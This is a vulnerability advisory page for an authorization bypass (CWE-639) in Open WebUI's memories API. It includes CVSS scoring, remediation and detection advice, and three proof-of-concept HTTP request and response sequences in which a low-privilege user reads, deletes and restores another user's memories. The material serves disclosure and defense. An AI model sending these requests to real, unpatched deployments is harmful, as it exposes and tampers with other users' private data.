Skip to main content

Open WebUI CVE-2026-44570

HIGH
Authorization Bypass Through User-Controlled Key (CWE-639)
2026-05-11 https://github.com/open-webui/open-webui GHSA-hmjq-crxp-7rjw
8.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.3 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

Lifecycle Timeline

3
Source Code Evidence Fetched
May 11, 2026 - 14:45 vuln.today
Analysis Generated
May 11, 2026 - 14:45 vuln.today
CVE Published
May 11, 2026 - 14:25 nvd
HIGH 8.3

DescriptionGitHub Advisory

Summary

Authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories.

Details

Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. See below under the PoC section, where a call to GET /api/v1/memories/ returns [] (as expected) but a call to POST /api/v1/memories/query reveals memories created by other users.

Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known.

The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again.

PoC 1

Example of a user with no memories able to query an existing memory from another user

GET /api/v1/memories/ HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 0

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:19:58 GMT
server: uvicorn
content-length: 2
content-type: application/json
x-process-time: 0

[]
POST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive

{
  "content": ""
}

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:22:01 GMT
server: uvicorn
content-length: 187
content-type: application/json
x-process-time: 0
access-control-allow-origin: *
access-control-allow-credentials: true

{"ids":[["d6802d76-a50f-4255-b68e-0f60c335e043"]],"documents":[["My secret content"]],"metadatas":[[{"created_at":1752784616,"updated_at":1752864797}]],"distances":[[0.6216812525921495]]}

PoC 2

Example showing excess output about a memory a user has no access to modify

POST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 23

{
  "content": ""
}

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 18:53:37 GMT
server: uvicorn
content-length: 172
content-type: application/json
x-process-time: 0

{"id":"d6802d76-a50f-4255-b68e-0f60c335e043","user_id":"a050e531-356b-4673-8772-ff1aecdf3273","content":"My secret content","updated_at":1752864797,"created_at":1752784616}

PoC 3

Example showing a memory being deleted then restored by a different user than its owner

DELETE /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043 HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Connection: keep-alive

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:31:19 GMT
server: uvicorn
content-length: 4
content-type: application/json
x-process-time: 0

true
POST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive

{
  "content": ""
}

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:32:31 GMT
server: uvicorn
content-length: 63
content-type: application/json
x-process-time: 0

{"ids":[[]],"documents":[[]],"metadatas":[[]],"distances":[[]]}
POST /api/v1/memories/d6802d76-a50f-4255-b68e-0f60c335e043/update HTTP/1.1
Host: localhost:8080
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
Accept: application/json
Content-Type: application/json
Connection: keep-alive
Content-Length: 23

{
  "content": ""
}

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:33:05 GMT
server: uvicorn
content-length: 172
content-type: application/json
x-process-time: 0

{"id":"d6802d76-a50f-4255-b68e-0f60c335e043","user_id":"a050e531-356b-4673-8772-ff1aecdf3273","content":"My secret content","updated_at":1752864797,"created_at":1752784616}
POST /api/v1/memories/query HTTP/1.1
Host: localhost:8080
Content-Length: 19
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjUxYmI2MTZkLWI4MDktNDkwZi1hNDFmLTg5MWIwYmY0OGUyOCJ9.4W1ju8dp2LdiBbgD3q0RZ6r2Xf26ti0c-PQn7tWYXEE
User-Agent: Test
accept: application/json
Content-Type: application/json
Connection: keep-alive

{
  "content": ""
}

---

HTTP/1.1 200 OK
date: Fri, 18 Jul 2025 19:33:34 GMT
server: uvicorn
content-length: 187
content-type: application/json
x-process-time: 0

{"ids":[["d6802d76-a50f-4255-b68e-0f60c335e043"]],"documents":[["My secret content"]],"metadatas":[[{"created_at":1752784616,"updated_at":1752864797}]],"distances":[[0.6216812525921495]]}

Impact

Potential disclosure of sensitive data stored within a user's memories. Disclosure of unique user ID values to non-admins when viewing a memory.

AnalysisAI

Authenticated low-privilege users in Open WebUI (pip package versions prior to 0.6.19) can access, delete, and restore other users' memory data through inconsistent authorization controls in the memories API. The /api/v1/memories/query endpoint allows any authenticated user to query all memories across the system regardless of ownership, while the DELETE and update endpoints enable unauthorized manipulation of other users' memory objects. A publicly available exploit code exists with three detailed proof-of-concept demonstrations published in the GitHub security advisory GHSA-hmjq-crxp-7rjw. The vulnerability carries a CVSS score of 8.3 with High confidentiality and integrity impact, exploitable remotely with low attack complexity requiring only low-privilege authentication (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L).

Technical ContextAI

This vulnerability affects the Open WebUI Python package (pkg:pip/open-webui), a web-based interface for interacting with AI models that implements a multi-user memory storage system. The flaw stems from CWE-639 (Authorization Bypass Through User-Controlled Key), where the API endpoints fail to enforce proper authorization checks before granting access to memory objects. The memories API consists of multiple REST endpoints (/api/v1/memories/query, /api/v1/memories/{memory_id}/update, DELETE /api/v1/memories/{memory_id}) that store user-specific contextual data. While the GET /api/v1/memories/ endpoint correctly enforces user-scoped authorization and returns only the authenticated user's memories, the POST /api/v1/memories/query endpoint bypasses this authorization entirely, querying the underlying memory store without filtering by user_id. Similarly, the update and delete endpoints accept memory_id parameters directly from user input without validating ownership, allowing horizontal privilege escalation. The vulnerability exists in the API layer built on uvicorn/FastAPI framework, where JWT bearer tokens authenticate users but authorization logic inconsistently validates resource ownership across different endpoints.

RemediationAI

Organizations should immediately upgrade to Open WebUI version 0.6.19 or later, which contains vendor-released patches for the authorization bypass vulnerability. The fix is available through standard pip package update: 'pip install --upgrade open-webui>=0.6.19'. The vendor advisory confirming the patched version is available at https://github.com/open-webui/open-webui/security/advisories/GHSA-hmjq-crxp-7rjw. For environments unable to immediately patch, implement network-level access controls to restrict the /api/v1/memories/* endpoints to trusted IP ranges only, though this provides limited protection against authenticated insider threats. Consider temporarily disabling the memories feature entirely if not business-critical until patching is complete-note this will impact user experience for AI conversation context persistence. Monitor API logs for suspicious patterns such as authenticated users making high-volume queries to /api/v1/memories/query or accessing memory_id values outside expected ranges, though determined attackers can evade detection. Review application logs from before patching to identify potential unauthorized access to memories data, focusing on POST requests to /api/v1/memories/query and DELETE/update operations from users who shouldn't have access to specific memory_id values. These compensating controls are interim measures only-version upgrade to 0.6.19+ is the only complete remediation.

Share

CVE-2026-44570 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy